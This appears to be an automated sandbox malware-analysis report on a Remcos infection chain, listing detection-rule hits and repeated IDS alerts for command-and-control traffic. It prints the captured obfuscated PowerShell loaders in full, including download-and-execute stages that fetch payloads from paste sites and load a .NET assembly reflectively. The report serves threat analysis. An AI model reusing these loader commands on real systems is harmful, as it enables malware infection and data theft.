CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] 
$dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 980, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, ProcessId: 5480, ProcessName: powershell.exe
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , 
'____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 980, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", ProcessId: 5480, ProcessName: wscript.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU
?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?

                    Stealing of Sensitive Information

                    Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 7372, TargetFilename: C:\ProgramData\remcos\logs.dat
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-31T07:41:19.521177+0100 | 2020423 | 1 | Exploit Kit Activity Detected | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-31T07:41:19.521177+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-31T07:41:22.031540+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:23.610045+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:25.190506+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:26.756293+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:28.312938+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:29.875749+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:31.453622+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:33.953405+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:35.531715+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:37.109960+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:38.675448+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:40.234871+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:41.817111+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:43.391319+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49754 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:44.969400+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:46.532179+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49756 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:48.095206+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:49.656958+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49758 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:51.220517+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49759 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:52.815631+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49760 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:54.375581+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49761 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:55.937978+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49762 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:57.672426+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49764 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:59.250597+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49766 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:00.815279+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49777 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:02.376348+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49783 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:03.938417+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49794 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:05.500475+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49805 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:07.079178+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49816 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:08.657245+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49824 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:10.238744+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49833 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:11.813179+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49844 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:13.377766+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49853 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:14.938356+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49861 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:16.438779+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49872 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:17.918640+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49881 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:19.344349+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49889 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:20.766372+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49899 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:22.244555+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49910 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:23.625678+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49917 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:24.962289+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49923 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:26.266463+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49934 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:27.570771+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49940 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:28.844251+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49951 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:30.076346+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49957 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:31.297618+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49965 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:32.485126+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49974 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:33.657910+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49980 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:34.813151+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49989 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:35.954553+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49997 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:37.063222+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50003 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:38.157818+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50009 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:39.219852+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50018 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:40.270568+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50026 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:41.314003+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50032 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:42.344399+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50038 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:43.385290+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50044 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:44.375625+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50051 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:45.359620+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50058 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:46.329576+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50064 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:47.287882+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50067 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:48.219436+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50068 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:49.141592+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50069 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:50.063925+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50070 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:50.970039+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50071 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:51.875778+010020327761Malware Command and Control Activity Detected192.168.2.450072181.236.112.1692001TCP
                    2024-10-31T07:42:52.780861+010020327761Malware Command and Control Activity Detected192.168.2.450073181.236.112.1692001TCP
                    2024-10-31T07:42:53.641839+010020327761Malware Command and Control Activity Detected192.168.2.450074181.236.112.1692001TCP
                    2024-10-31T07:42:54.518547+010020327761Malware Command and Control Activity Detected192.168.2.450075181.236.112.1692001TCP
                    2024-10-31T07:42:55.398388+010020327761Malware Command and Control Activity Detected192.168.2.450076181.236.112.1692001TCP
                    2024-10-31T07:42:56.235002+010020327761Malware Command and Control Activity Detected192.168.2.450077181.236.112.1692001TCP
                    2024-10-31T07:42:57.176751+010020327761Malware Command and Control Activity Detected192.168.2.450078181.236.112.1692001TCP
                    2024-10-31T07:42:58.020953+010020327761Malware Command and Control Activity Detected192.168.2.450079181.236.112.1692001TCP
                    2024-10-31T07:42:58.829009+010020327761Malware Command and Control Activity Detected192.168.2.450080181.236.112.1692001TCP
                    2024-10-31T07:42:59.783941+010020327761Malware Command and Control Activity Detected192.168.2.450081181.236.112.1692001TCP
                    2024-10-31T07:43:00.580874+010020327761Malware Command and Control Activity Detected192.168.2.450082181.236.112.1692001TCP
                    2024-10-31T07:43:01.380012+010020327761Malware Command and Control Activity Detected192.168.2.450083181.236.112.1692001TCP
                    2024-10-31T07:43:02.178849+010020327761Malware Command and Control Activity Detected192.168.2.450084181.236.112.1692001TCP
                    2024-10-31T07:43:02.970527+010020327761Malware Command and Control Activity Detected192.168.2.450085181.236.112.1692001TCP
                    2024-10-31T07:43:03.737488+010020327761Malware Command and Control Activity Detected192.168.2.450086181.236.112.1692001TCP
